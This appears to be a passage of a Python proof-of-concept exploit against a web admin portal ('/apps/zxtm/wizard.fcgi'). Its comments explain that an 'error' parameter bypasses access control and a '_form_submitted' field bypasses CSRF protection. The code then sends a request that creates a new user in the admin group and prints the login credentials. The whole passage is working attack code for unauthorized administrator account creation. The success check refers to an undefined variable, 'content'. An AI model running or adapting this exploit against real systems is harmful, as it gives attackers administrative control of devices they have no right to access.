# Setting 'error' bypasses access control for wizard.fcgi.
# wizard.fcgi can load any section in the web interface.
params = { 'error': 1,
'section': 'Access Management:LocalUsers' }
# Create new user request
# _form_submitted to bypass CSRF
data = { '_form_submitted': 'form',
'create_user': 'Create',
'group': 'admin',
'newusername': new_admin_name,
'password1': new_admin_password,
'password2': new_admin_password }
# Post request
r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False)
if r.status_code == 200 and '<title>2<' in content:
print("New user request sent")
print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'")
else:
print("Unable to create new user")